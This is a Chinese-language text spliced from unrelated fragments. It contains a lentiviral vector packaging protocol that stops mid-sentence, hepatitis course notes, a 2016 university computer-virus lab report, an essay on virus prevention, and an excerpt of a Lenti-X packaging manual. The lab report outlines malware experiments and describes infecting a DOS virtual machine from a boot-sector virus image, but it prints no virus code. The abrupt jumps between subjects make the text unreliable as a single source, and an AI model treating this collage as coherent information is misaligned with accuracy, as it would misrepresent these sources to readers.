包装成分:由HIV-1基因组去除了包装、逆转录和整合所需的顺式作用序列而构建,能够反式提供产生病毒颗粒所必需的蛋白。包装成分通常被分开构建到两个质粒上,一个质粒表达Gag和Pol蛋白,另一个质粒表达Env蛋白,其目的也是降低恢复成野生型病毒的可能。将包装成分与载体成分的3个质粒共转染细胞(如人肾293T细胞),即可在细胞上清中收获只有一次性感染能力而无复制能力的、携带目的基因的HIV-1载体颗粒。 载体成分:与包装成分互补,即含有包装、逆转录和整合所需的HIV顺式作用序列,同时具有异源启动子控制下的多克隆位点及在此位点插入的目的基因。 为降低两种成分同源重组恢复成野生型病毒的可能,需尽量减少二者的同源性,如将包装成分上5′LTR换成巨细胞病毒(CMV)立即早期启动子、3′LTR换成SV40 polyA等。 一、实验流程(1和2为并列步骤) 1.慢病毒过表达质粒载体的构建 设计上下游特异性扩增引物,同时引入酶切位点,PCR(采用高保真KOD酶,3K内突变率为0%)从模板中(CDNA质粒或者文库)调取目的基因CDS区(coding sequence)连入T载体。将CDS区从T载体上切下,装入慢病毒过表达质粒载体。 2.慢病毒干扰质粒载体的构建 合成siRNA对应的DNA颈环结构,退火后连入慢病毒干扰质粒载体 3. 慢病毒载体的包装与浓缩纯化 制备慢病毒穿梭质粒及其辅助包装原件载体质粒,三种质粒载体分别进行高纯度无内毒素抽提,共转染293T细胞,转染后6 h 更换为完全培养基,培养24和48h后,分别收集富含
张国军(首都医科大学附属北京天坛医院实验诊断中心) 写在课前的话 病毒性肝炎种类较多,在我国发病率较高,以乙肝最为常见。学员通过本课件的学习,要熟悉病毒性肝炎的类型及共同特点;掌握病毒性肝炎各类型的特征(包括抗原抗体特性);掌握病毒性肝炎的流 行病学;掌握病毒性肝炎的发病机制;掌握各种肝炎的临床特点;熟悉实验室检测内容。 一.概述 病毒性肝炎是多种肝炎病毒引起的,以肝脏的炎症和坏死病变为主的一组传染病。主要通过粪-口、血液或体液传播。主要的临床表现:疲乏、食欲减退、肝肿大、肝功能异常,部分病例可以出现黄疸,无症状感染者较常见。 病毒性肝炎是我国感染率和发病率最高的传染病,其中以乙型病毒性肝炎最常见,大约有25% HBsAg阳性者可发展为慢性肝病(慢性肝炎、肝硬化、肝癌),乙型肝炎发生肝癌的相对危险率为10~100倍。 目前已经确定的病毒性肝炎有5型:甲型、乙型、丙型、丁型、戊型肝炎,最近发现两种:庚型和输血引起的肝炎。 这些肝炎病毒的共同特点:除了乙肝病毒和输血引起的病毒属DNA病毒外,其余的都属RNA病毒;除了乙型肝炎病毒有3个主要抗原抗体系统外,其余的只有一个抗原抗体系统;甲型肝炎和戊型肝炎病毒在肝细胞内复制,可以通过胆汁从粪便排出;病毒的抵抗力较强,耐冷、耐干燥、一般消毒无效。 二.各种肝炎病毒的特征 (一)甲型肝炎病毒 甲型肝炎病毒(HAV)属小核糖核酸病毒科嗜肝RNA病毒属;甲肝病毒是球形,直径27 - 28 nm,无包膜;甲型肝炎病毒只有一个抗原抗体系统。抗甲型肝炎病毒IgM ,存在6个月,属近期感染;抗甲型肝炎病毒IgG,可存在多年,表现既往感染。甲型肝炎病毒抗原可在粪便中检出,通常用于科研。 (二)乙型肝炎病毒 乙型肝炎病毒(HBV)属嗜肝脱氧核糖核酸病毒科哺乳动物病毒属;病毒颗粒直径42 nm ,含两部分:包膜部分含有表面抗原、糖蛋白、细胞脂肪;核心部分含有乙型肝炎病毒DNA、DNA-P和核心抗原。 HBV基因组的结构与功能:分为正链和负链,正链无编码功能,负链有4个开放的读码区:S、C、P和X。S 区:编码包膜蛋白,前S1、前S2、HbsAg;C区:编码核壳蛋白,HBcAg,前C区编码HbeAg;P区:编码DNA-P,具有逆转录酶活性;X区:编码HBxAg,具有反激活作用。 HBV表面抗原通常出现于病毒感染的1 - 12 周,急性可持续1 - 20周,慢性可存续很多年。临床意义:在急性期是感染的标志,无传染性。
南京航空航天大学计算机病毒及防治上机实验报告 学院:理学院 专业:信息与计算科学 学号:081310128 姓名:王晨雨 授课老师:薛明富 二〇一六年十二月
实验一:引导型病毒实验 (2) 【实验目的】 (2) 【实验平台】 (2) 【试验内容】 (2) 实验二:Com病毒实验 (6) 【实验目的】 (6) 【实验平台】 (6) 【试验内容】 (6) 实验三:PE文件格式实验 (9) 实验四:32位文件型病毒实验 (11) 实验五:简单的木马实验 (14) 实验七:木马病毒清除实验(选做) (19) 实验八:Word宏病毒实验(一) (22) 实验目的 (22) 实验所需条件和环境 (22) 实验内容和分析 (23) 实验九:Word宏病毒实验(二) (27) 清除宏病毒 (29) 实验十:Linux脚本病毒实验(选做) (32) 实验十二:基于U盘传播的蠕虫病毒实验 (33) 实验十三:邮件型病毒实验 (36) 实验十四:Web恶意代码实验 (39) 实验一: (39) 实验二: (39)
实验一:引导型病毒实验 【实验目的】 通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染病毒文件的方法,提高汇编语言的使用能力。 实验内容 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。 DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制:阅读和分析病毒的代码。 【实验平台】 VMWare Workstation 12 PRO MS-DOS 7.10 【试验内容】 第一步:环境安装 安装虚拟机VMWare,在虚拟机环境内安装MS-DOS 7.10环境。 第二步:软盘感染硬盘 1)运行虚拟机,检查目前虚拟硬盘是否含有病毒,图1表示没有病毒正常启动硬盘的 状态。 2)在附书资源中复制含有病毒的虚拟软盘virus.img 3)将含有病毒的软盘插入虚拟机引导,可以看到闪动的字符*^_^*,如图2所示,按 任意键进入图3。 第三步:验证硬盘已经被感染 1)取出虚拟软盘,通过硬盘引导,再次出现了病毒的画面如图4。 2)按任意键后正常引导了DOS系统如图5。可见,硬盘已被感染。 第四步:硬盘感染软盘 1)下载empty.img,并且将它插入虚拟机,启动计算机,由于该盘为空,如图6. 2)取出虚拟软盘,从硬盘启动,通过命令format A:/q快速格式化软盘。可能提示出 错,这时只要按R键即可。如图7. 3)成功格式化后的结果如图8。 4)不要取出虚拟软盘,重新启动虚拟机,这时是从empty.img引导,可以看到病毒的 画面,如图9。按任意键进入图10.可见,病毒已经成功由硬盘传染给了软盘。
计算机病毒的防范 随着计算机及计算机网络的发展,伴随而来的计算机病毒传播问题越来越引起人们的关注。随因特网的流行,有些计算机病毒借助网络爆发流行,如CIH计算机病毒、“爱虫”病毒等,它们与以往的计算机病毒相比具有一些新的特点,给广大计算机用户带来了极大的损失。 当计算机系统或文件染有计算机病毒时,需要检测和消除。但是,计算机病毒一旦破坏了没有副本的文件,便无法医治。隐性计算机病毒和多态性计算机病毒更使人难以检测。在与计算机病毒的对抗中,如果能采取有效的防范措施,就能使系统不染毒,或者染毒后能减少损失。 计算机病毒防范,是指通过建立合理的计算机病毒防范体系和制度,及时发现计算机病毒侵入,并采取有效的手段阻止计算机病毒的传播和破坏,恢复受影响的计算机系统和数据。 计算机病毒利用读写文件能进行感染,利用驻留内存、截取中断向量等方式能进行传染和破坏。预防计算机病毒就是要监视、跟踪系统内类似的操作,提供对系统的保护,最大限度地避免各种计算机病毒的传染破坏。 计算机病毒的工作方式是可以分类的,防杀计算机病毒软件就是针对已归纳总结出的这几类计算机病毒工作方式来进行防范的。当被分析过的已知计算机病毒出现时,由于其工作方式早已被记录在案,防杀计算机病毒软件能识别出来;当未曾被分析过的计算机病毒出现时,如果其工作方式仍可被归入已知的工作方式,则这种计算机病毒能被反病毒软件所捕获。这也就是采取积极防御措施的计算机病毒防范方法优越于传统方法的地方。 计算机病毒防范工作,首先是防范体系的建设和制度的建立。没有一个完善的防范体系,一切防范措施都将滞后于计算机病毒的危害。 计算机病毒防范体系的建设是一个社会性的工作,不是一两个人、一两家企业能够实现的,需要全社会的参与,充分利用所有能够利用的资源,形成广泛的、全社会的计算机病毒防范体系网络。 一.计算机病毒的技术预防措施 下面总结出一系列行之有效的措施供参考。 1、新购置的计算机硬软件系统的测试 新购置的计算机是有可能携带计算机病毒的。因此,在条件许可的情况下,要用检测计算机病毒软件检查已知计算机病毒,用人工检测方法检查未知计算机病毒,并经过证实没有计算机病毒感染和破坏迹象后再使用。
Clontech-Lenti-X? Lentiviral Expression Systems User ManualProtocol No. PT5135-1慢病毒包装操作说明 A.用Lenti-X HTX Packaging System生产慢病毒悬浮物为了获得最高效价的病毒悬液,用Lenti-X 293T细胞系,严格尊守以下说明,尤其尊守(1)培养体系和培养量(2)DNA的量和转染质量(3)无四环素血清(4)孵育时间。 所有的Xfect?转染成份,量和条件最好用Lenti-XVectors,Lenti-XHTX包装混合物,Lenti-X293T细胞。 用10cm组织培养板并确保血清无四环素,四环素污染的血清对表达包装成份是有害的。 所有的实验步骤均在无菌组织培养器血中完成。 包装病毒需要有微生物安全等级2的生物安全柜中进行,注意重组的假性慢病毒包装颗粒能够感染人。 6 1.转染24小时前,在10cm培养板接种4-5×10个293T细胞,添加10ml的生长培养基。 在37℃,5%CO2℃条件下过夜。 在进行第7步前确保培养血有80-90%的覆盖率。 2.充分混均Xfect Polymer。 3.每个转染样品需准备两个离心管,按顺序添加如下试剂Tube 1(Plasmid DNA) Tube 2(Polymer)557μlXfectReaction Buffer 592.5μl Xfect ReactionBuffer36μl Lenti-X HTX Packaging Mix 7.5μl Xfect Polymer7μl Lenti-X Vector DNA(1μg/μl)600μl 总量600μl 总量注意: Xfect Polymer不要在室温下搁置长于30min